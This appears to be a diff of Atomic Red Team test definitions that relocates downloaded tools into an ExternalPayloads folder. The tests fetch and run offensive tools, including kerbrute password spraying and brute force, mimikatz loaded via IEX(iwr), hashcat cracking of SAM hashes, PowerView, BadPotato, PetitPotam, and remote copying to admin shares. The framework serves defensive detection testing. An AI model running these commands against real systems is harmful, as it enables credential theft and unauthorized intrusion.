+      Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4 -Force
+      Copy-Item PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4\* $parentpath -Recurse
+      Remove-Item PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4.zip,PathToAtomicsFolder\..\ExternalPayloads\TDirLister.v2.beta4 -Recurse -ErrorAction Ignore
   executor:
     command: |
       Start-Process #{dirlister_path}

atomics/T1087.002/T1087.002.yaml

@@ -51,7 +51,7 @@ atomic_tests:
     adrecon_path:
       description: Path of ADRecon.ps1 file
       type: path
-      default: $env:TEMP\ADRecon.ps1
+      default: PathToAtomicsFolder\..\ExternalPayloads\ADRecon.ps1
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -59,13 +59,13 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{adrecon_path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
       Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile #{adrecon_path}
   executor:
     command: |
       Invoke-Expression #{adrecon_path}
     cleanup_command: |
-      Remove-Item #{adrecon_path} -Force -ErrorAction Ignore | Out-Null
-      Get-ChildItem $env:TEMP -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse
+      Get-ChildItem PathToAtomicsFolder\..\ExternalPayloads -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse
     name: powershell
 - name: Adfind -Listing password policy
   auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600
@@ -297,21 +297,21 @@ atomic_tests:
   dependency_executor_name: powershell
   dependencies:
   - description: |
-      kerbrute.exe must exist in $env:temp.
+      kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads.
     prereq_command: |
-      if (test-path $env:temp\kerbrute.exe){exit 0} else {exit 1}
+      if (test-path PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe){exit 0} else {exit 1}
     get_prereq_command: |
-      invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "$env:TEMP\kerbrute.exe"
+      invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"
   - description: |
-      username text file must exist in $env:temp.
+      username text file must exist in PathToAtomicsFolder\..\ExternalPayloads.
     prereq_command: |
-      if (test-path $env:temp\username.txt){exit 0} else {exit 1}
+      if (test-path PathToAtomicsFolder\..\ExternalPayloads\username.txt){exit 0} else {exit 1}
     get_prereq_command: |
-      invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/src/username.txt?raw=true" -outfile "$env:TEMP\username.txt"
+      invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/src/username.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
   executor:
     command: |-
-      cd $env:temp
-      .\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} $env:TEMP\username.txt
+      cd PathToAtomicsFolder\..\ExternalPayloads
+      .\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} PathToAtomicsFolder\..\ExternalPayloads\username.txt
     name: powershell
 - name: Wevtutil - Discover NTLM Users Remote
   auto_generated_guid: b8a563d4-a836-4993-a74e-0a19b8481bfe

atomics/T1090.003/T1090.003.yaml

@@ -54,7 +54,7 @@ atomic_tests:
     TorExe:
       description: Location of tor.exe file.
       type: string
-      default: $env:temp\tor\Tor\tor.exe
+      default: PathToAtomicsFolder\..\ExternalPayloads\tor\Tor\tor.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -62,8 +62,9 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{TorExe}) {exit 0} else {exit 1}
     get_prereq_command: |
-      Start-BitsTransfer -Source "https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip" -Destination "$env:temp\tor.zip" -dynamic
-      expand-archive -LiteralPath "$env:temp\tor.zip" -DestinationPath "$env:temp\tor"
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\tor.zip"
+      expand-archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\tor.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\tor"
   executor:
     command: |
       invoke-expression 'cmd /c start powershell -Command {cmd /c #{TorExe}}'

atomics/T1095/T1095.yaml

@@ -34,11 +34,11 @@ atomic_tests:
     ncat_exe:
       description: The location of ncat.exe
       type: path
-      default: $env:TEMP\T1095\nmap-7.80\ncat.exe
+      default: PathToAtomicsFolder\..\ExternalPayloads\T1095\nmap-7.80\ncat.exe
     ncat_path:
       description: The folder path of ncat.exe
       type: path
-      default: $env:TEMP\T1095
+      default: PathToAtomicsFolder\..\ExternalPayloads\T1095
     server_ip:
       description: The IP address or domain name of the listening server
       type: string

atomics/T1105/T1105.yaml

@@ -321,7 +321,7 @@ atomic_tests:
   - description: 'Must have a Windows Defender version with MpCmdRun.exe installed'
     prereq_command: |
       cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
-      MpCmdRun.exe /?
+      MpCmdRun.exe /?  >nul 2>&1
     get_prereq_command: Echo "A version of Windows Defender with MpCmdRun.exe must be installed manually"
   executor:
     command: |
@@ -460,11 +460,11 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{curl_path}) {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip
-      Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
-      Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe
-      Remove-Item $env:temp\curl
-      Remove-Item $env:temp\curl.zip
+      Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\curl.zip
+      Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\curl.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\curl
+      Copy-Item PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe
+      Remove-Item PathToAtomicsFolder\..\ExternalPayloads\curl
+      Remove-Item PathToAtomicsFolder\..\ExternalPayloads\curl.zip
   executor:
     command: |
       #{curl_path} -k #{file_download} -o c:\users\public\music\allthethingsx64.dll
@@ -505,11 +505,11 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{curl_path}) {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile $env:temp\curl.zip
-      Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
-      Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe
-      Remove-Item $env:temp\curl
-      Remove-Item $env:temp\curl.zip
+      Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile PathToAtomicsFolder\..\ExternalPayloads\curl.zip
+      Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\curl.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\curl
+      Copy-Item PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe
+      Remove-Item PathToAtomicsFolder\..\ExternalPayloads\curl
+      Remove-Item PathToAtomicsFolder\..\ExternalPayloads\curl.zip
   - description: |
       A file must be created to upload
     prereq_command: |
@@ -589,17 +589,17 @@ atomic_tests:
     get_prereq_command: |
       write-host "The binary_file input parameter must be set to a binary that exists on this computer."
   - description: |
-      Machine list must exist at specified location ("$env:temp\T1105MachineList.txt")
+      Machine list must exist at specified location ("PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt")
     prereq_command: |
-      if (Test-Path "$env:temp\T1105MachineList.txt") {exit 0} else {exit 1}
+      if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt") {exit 0} else {exit 1}
     get_prereq_command: |
-      new-item -path "$env:temp\T1105MachineList.txt"
-      echo "A machine list file has been generated at "$env:temp\T1105MachineList.txt". Please enter the machines to target there, one machine per line."
+      new-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt" | Out-Null
+      echo "A machine list file has been generated at "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt". Please enter the machines to target there, one machine per line."
   executor:
     command: |
-      $machine_list = "$env:temp\T1105MachineList.txt"
-      $offline_list = "$env:temp\T1105OfflineHosts.txt"
-      $completed_list = "$env:temp\T1105CompletedHosts.txt"
+      $machine_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt"
+      $offline_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt"
+      $completed_list = "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt"
       foreach ($machine in get-content -path "$machine_list")
       {if (test-connection -Count 1 -computername $machine -quiet) 
       {cmd /c copy "#{binary_file}" "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}"
@@ -608,12 +608,12 @@ atomic_tests:
       else
       {echo $machine >> "$offline_list"}}
     cleanup_command: |
-      if (test-path "$env:temp\T1105CompletedHosts.txt") 
-      {foreach ($machine in get-content -path "$env:temp\T1105CompletedHosts.txt")
+      if (test-path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt") 
+      {foreach ($machine in get-content -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt")
       {wmic /node: "$machine" process where name='"regsvr32.exe"' call terminate | out-null
       Remove-Item -path "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}" -force -erroraction silentlycontinue}}
-      Remove-Item -path "$env:temp\T1105OfflineHosts.txt" -erroraction silentlycontinue
-      Remove-item -path "$env:temp\T1105CompletedHosts.txt" -erroraction silentlycontinue
+      Remove-Item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105OfflineHosts.txt" -erroraction silentlycontinue
+      Remove-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105CompletedHosts.txt" -erroraction silentlycontinue
     name: powershell
 
 - name: Printer Migration Command-Line Tool UNC share folder into a zip file
@@ -777,7 +777,7 @@ atomic_tests:
     local_nimgrab:
       description: Local path to nimgrab
       type: path
-      default: $env:TEMP\nimgrab.exe
+      default: PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe
   executor:
     command: |
       cmd /c nimgrab.exe #{remote_file} #{destination_path}
@@ -791,11 +791,11 @@ atomic_tests:
     prereq_command: |
       if (Test-Path "#{local_nimgrab}") {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile $env:temp\nim.zip
-      Expand-Archive -Path $env:temp\nim.zip -DestinationPath $env:temp\nim -Force
-      Copy-Item $env:temp\nim\nim-1.6.6\bin\nimgrab.exe #{local_nimgrab}
-      Remove-Item $env:temp\nim
-      Remove-Item $env:temp\nim.zip
+      Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\nim.zip
+      Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\nim.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\nim -Force
+      Copy-Item PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe #{local_nimgrab}
+      Remove-Item PathToAtomicsFolder\..\ExternalPayloads\nim
+      Remove-Item PathToAtomicsFolder\..\ExternalPayloads\nim.zip
 - name: iwr or Invoke Web-Request download
   auto_generated_guid: c01cad7f-7a4c-49df-985e-b190dcf6a279
   description: |

atomics/T1110.001/T1110.001.yaml

@@ -135,22 +135,23 @@ atomic_tests:
   dependency_executor_name: powershell
   dependencies:
   - description: |
-      kerbrute.exe must exist in $env:temp
+      kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads
     prereq_command: |
-      if (test-path $env:temp\kerbrute.exe){exit 0} else {exit 1}
+      if (test-path PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe){exit 0} else {exit 1}
     get_prereq_command: |
-      invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "$env:temp\kerbrute.exe"
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"
   - description: |
-      bruteuser.txt must exist in $env:temp
+      bruteuser.txt must exist in PathToAtomicsFolder\..\ExternalPayloads
     prereq_command: |
-      if (test-path $env:temp\bruteuser.txt){exit 0} else {exit 1}
+      if (test-path PathToAtomicsFolder\..\ExternalPayloads\bruteuser.txt){exit 0} else {exit 1}
     get_prereq_command: |
-      invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/src/bruteuser.txt?raw=true" -outfile "$env:temp\bruteuser.txt"
+      invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/src/bruteuser.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\bruteuser.txt"
   executor:
     name: powershell
     elevation_required: false
     command: |
-      cd $env:temp
+      cd PathToAtomicsFolder\..\ExternalPayloads
       .\kerbrute.exe bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\bruteuser.txt TestUser1 
 
 - name: SUDO Brute Force - Debian

atomics/T1110.002/T1110.002.yaml

@@ -10,7 +10,7 @@ atomic_tests:
     hashcat_exe:
       description: Path to Hashcat executable
       type: string
-      default: '%temp%\hashcat6\hashcat-6.1.1\hashcat.exe'
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\hashcat6\hashcat-6.1.1\hashcat.exe'
     input_file_sam:
       description: Path to SAM file
       type: string
@@ -24,20 +24,21 @@ atomic_tests:
   - description: Hashcat must exist on disk at specified location (#{hashcat_exe})
     prereq_command: 'if (Test-Path  $(cmd /c echo #{hashcat_exe})) {exit 0} else {exit 1}'
     get_prereq_command: |-
-      Invoke-WebRequest "https://www.7-zip.org/a/7z1900.exe" -OutFile "$env:TEMP\7z1900.exe"
-      Start-Process -FilePath "$env:Temp\7z1900.exe" -ArgumentList "/S /D=$env:temp\7zi" -NoNewWindow
-      Invoke-WebRequest "https://hashcat.net/files/hashcat-6.1.1.7z" -OutFile "$env:TEMP\hashcat6.7z"
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://www.7-zip.org/a/7z1900.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\7z1900.exe"
+      Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\7z1900.exe" -ArgumentList "/S /D=PathToAtomicsFolder\..\ExternalPayloads\7zi" -NoNewWindow
+      Invoke-WebRequest "https://hashcat.net/files/hashcat-6.1.1.7z" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\hashcat6.7z"
       Start-Process cmd.exe -Args  "/c %temp%\7z\7z.exe x %temp%\hashcat6.7z -aoa -o%temp%\hashcat-unzip" -Wait
       New-Item -ItemType Directory (Split-Path $(cmd /c echo #{hashcat_exe})) -Force | Out-Null
-      Move-Item $env:Temp\hashcat-unzip\hashcat-6.1.1\* $(cmd /c echo #{hashcat_exe}\..) -Force -ErrorAction Ignore
+      Move-Item PathToAtomicsFolder\..\ExternalPayloads\hashcat-unzip\hashcat-6.1.1\* $(cmd /c echo #{hashcat_exe}\..) -Force -ErrorAction Ignore
   executor:
     command: |-
       cd #{hashcat_exe}\..
       #{hashcat_exe} -a 0 -m 1000 -r .\rules\Incisive-leetspeak.rule #{input_file_sam} #{input_file_passwords}
     cleanup_command: |-
-      del %temp%\hashcat6.7z >nul 2>&1
-      del %temp%\7z1900.exe >nul 2>&1
-      del %temp%\7z /Q /S >nul 2>&1
-      del %temp%\hashcat-unzip /Q /S >nul 2>&1
+      del PathToAtomicsFolder\..\ExternalPayloads\hashcat6.7z >nul 2>&1
+      del PathToAtomicsFolder\..\ExternalPayloads\7z1900.exe >nul 2>&1
+      del PathToAtomicsFolder\..\ExternalPayloads\7z /Q /S >nul 2>&1
+      del PathToAtomicsFolder\..\ExternalPayloads\hashcat-unzip /Q /S >nul 2>&1
     name: command_prompt
     elevation_required: true

atomics/T1110.003/T1110.003.yaml

@@ -242,16 +242,17 @@ atomic_tests:
   dependency_executor_name: powershell
   dependencies:
   - description: |
-      MSOLSpray module must exist in $env:temp.
+      MSOLSpray module must exist in PathToAtomicsFolder\..\ExternalPayloads.
     prereq_command: |
-      if (test-path $env:temp\MSOLSpray.ps1){exit 0} else {exit 1}
+      if (test-path PathToAtomicsFolder\..\ExternalPayloads\MSOLSpray.ps1){exit 0} else {exit 1}
     get_prereq_command: |
-      invoke-webrequest "https://raw.githubusercontent.com/dafthack/MSOLSpray/922f159104fb3ec77c9fc6507a6388a05c227b5f/MSOLSpray.ps1" -outfile "$env:temp\MSOLSpray.ps1"
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      invoke-webrequest "https://raw.githubusercontent.com/dafthack/MSOLSpray/922f159104fb3ec77c9fc6507a6388a05c227b5f/MSOLSpray.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\MSOLSpray.ps1"
   executor:
     name: powershell
     elevation_required: false
     command: |
-      import-module "$env:temp\MSOLSpray.ps1"
+      import-module "PathToAtomicsFolder\..\ExternalPayloads\MSOLSpray.ps1"
       Invoke-MSOLSpray -UserList "#{user_list}" -Password "#{password}"
 - name: Password Spray using Kerbrute Tool
   auto_generated_guid: c6f25ec3-6475-47a9-b75d-09ac593c5ecb
@@ -271,23 +272,24 @@ atomic_tests:
   dependency_executor_name: powershell
   dependencies:
   - description: |
-      kerbrute.exe must exist in $env:temp
+      kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads
     prereq_command: |
-      if (test-path $env:temp\kerbrute.exe){exit 0} else {exit 1}
+      if (test-path PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe){exit 0} else {exit 1}
     get_prereq_command: |
-      invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "$env:temp\kerbrute.exe"
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"
   - description: |
-      passwordspray.txt must exist in $env:temp
+      passwordspray.txt must exist in PathToAtomicsFolder\..\ExternalPayloads
     prereq_command: |
-      if (test-path $env:temp\passwordspray.txt){exit 0} else {exit 1}
+      if (test-path PathToAtomicsFolder\..\ExternalPayloads\passwordspray.txt){exit 0} else {exit 1}
     get_prereq_command: |
-      invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/src/passwordspray.txt?raw=true" -outfile "$env:temp\passwordspray.txt"
+      invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/src/passwordspray.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\passwordspray.txt"
   executor:
     name: powershell
     elevation_required: false
     command: |
-      cd $env:temp
-      .\kerbrute.exe passwordspray --dc #{domaincontroller} -d #{domain} $env:temp\passwordspray.txt password132 
+      cd PathToAtomicsFolder\..\ExternalPayloads
+      .\kerbrute.exe passwordspray --dc #{domaincontroller} -d #{domain} PathToAtomicsFolder\..\ExternalPayloads\passwordspray.txt password132 
 - name: AWS - Password Spray an AWS using GoAWSConsoleSpray
   auto_generated_guid: 9c10d16b-20b1-403a-8e67-50ef7117ed4e
   description: |

atomics/T1110.004/T1110.004.yaml

@@ -81,20 +81,21 @@ atomic_tests:
   dependency_executor_name: powershell
   dependencies:
   - description: |
-      kerbrute.exe must exist in $env:temp
+      kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads
     prereq_command: |
-      if (test-path $env:temp\kerbrute.exe){exit 0} else {exit 1}
+      if (test-path PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe){exit 0} else {exit 1}
     get_prereq_command: |
-      invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "$env:temp\kerbrute.exe"
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"
   - description: |
-      bruteforce.txt must exist in $env:temp
+      bruteforce.txt must exist in PathToAtomicsFolder\..\ExternalPayloads
     prereq_command: |
-      if (test-path $env:temp\bruteforce.txt){exit 0} else {exit 1}
+      if (test-path PathToAtomicsFolder\..\ExternalPayloads\bruteforce.txt){exit 0} else {exit 1}
     get_prereq_command: |
-      invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/src/bruteforce.txt?raw=true" -outfile "$env:temp\bruteforce.txt"
+      invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/src/bruteforce.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\bruteforce.txt"
   executor:
     name: powershell
     elevation_required: false
     command: |
-      cd $env:temp
-      .\kerbrute.exe bruteforce --dc #{domaincontroller} -d #{domain} $env:temp\bruteforce.txt      
+      cd PathToAtomicsFolder\..\ExternalPayloads
+      .\kerbrute.exe bruteforce --dc #{domaincontroller} -d #{domain} PathToAtomicsFolder\..\ExternalPayloads\bruteforce.txt      

atomics/T1133/T1133.yaml

@@ -24,8 +24,9 @@ atomic_tests:
       Chrome must be installed
     prereq_command: 'if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}'
     get_prereq_command: |
-      Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.exe #{chrome_url}
-      Start-Process $env:temp\ChromeStandaloneSetup64.exe /S
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.exe #{chrome_url}
+      Start-Process PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.exe /S
   executor:
     name: powershell
     elevation_required: true

atomics/T1134.001/T1134.001.yaml

@@ -40,7 +40,7 @@ atomic_tests:
     nsudo_path:
       description: 'Path to the NSudo bat file'
       type: path
-      default: $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher\x64\NSudoLG.exe
+      default: PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components\NSudo_Launcher\x64\NSudoLG.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -48,10 +48,11 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{nsudo_path}) {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest -OutFile $env:TEMP\NSudo_8.2_All_Components.zip "https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip"
-      Expand-Archive -Path $env:TEMP\NSudo_8.2_All_Components.zip -DestinationPath $env:TEMP\NSudo_8.2_All_Components -Force
-      Rename-Item "$env:TEMP\NSudo_8.2_All_Components\NSudo Launcher" $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher
-      Remove-Item $env:TEMP\NSudo_8.2_All_Components.zip -Recurse -ErrorAction Ignore
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components.zip" "https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip"
+      Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components" -Force
+      Rename-Item "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components\NSudo Launcher\x64\NSudoLG.exe" "#{nsudo_path}"
+      Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components.zip" -Recurse -ErrorAction Ignore
   executor:
     command: |
       Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd"
@@ -70,12 +71,13 @@ atomic_tests:
   - description: |
       BadPotato.exe must exist in the temp directory
     prereq_command: |
-      if (Test-Path $env:temp\BadPotato.exe) {exit 0} else {exit 1}
+      if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\BadPotato.exe) {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest -OutFile $env:TEMP\BadPotato.exe "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/bin/BadPotato.exe?raw=true"
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest -OutFile PathToAtomicsFolder\..\ExternalPayloads\BadPotato.exe "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/bin/BadPotato.exe?raw=true"
   executor:
     command: |
-      cd $env:temp
+      cd PathToAtomicsFolder\..\ExternalPayloads
       Start-Process .\BadPotato.exe notepad.exe
       Start-Sleep -Second 20
       Stop-Process -Name "notepad" -force -erroraction silentlycontinue

atomics/T1134.005/T1134.005.yaml

@@ -19,7 +19,7 @@ atomic_tests:
     mimikatz_path:
       description: Mimikatz windows executable
       type: path
-      default: '$env:TEMP\mimikatz\x64\mimikatz.exe'
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe'
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -29,6 +29,7 @@ atomic_tests:
       if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
     get_prereq_command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
       IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) 
       $releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
       $zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }

atomics/T1135/T1135.yaml

@@ -113,12 +113,13 @@ atomic_tests:
       default: -CheckShareAccess
   dependencies:
   - description: Invoke-ShareFinder module must exist in %TEMP% directory
-    prereq_command: 'if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}'
+    prereq_command: 'if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1) {exit 0} else {exit 1}'
     get_prereq_command: |
-      Invoke-WebRequest "https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1" -OutFile $env:TEMP\PowerView.ps1
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1" -OutFile PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1
   executor:
     command: |
-      Import-Module $env:TEMP\PowerView.ps1
+      Import-Module PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1
       Invoke-ShareFinder #{parameters}
     name: powershell
 - name: WinPwn - shareenumeration

atomics/T1187/T1187.yaml

@@ -23,7 +23,7 @@ atomic_tests:
     petitpotam_path:
       description: PetitPotam Windows executable
       type: path
-      default: '$env:TEMP\PetitPotam.exe'
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\PetitPotam.exe'
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -32,6 +32,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path "#{petitpotam_path}") { exit 0 } else { exit 1 }
     get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
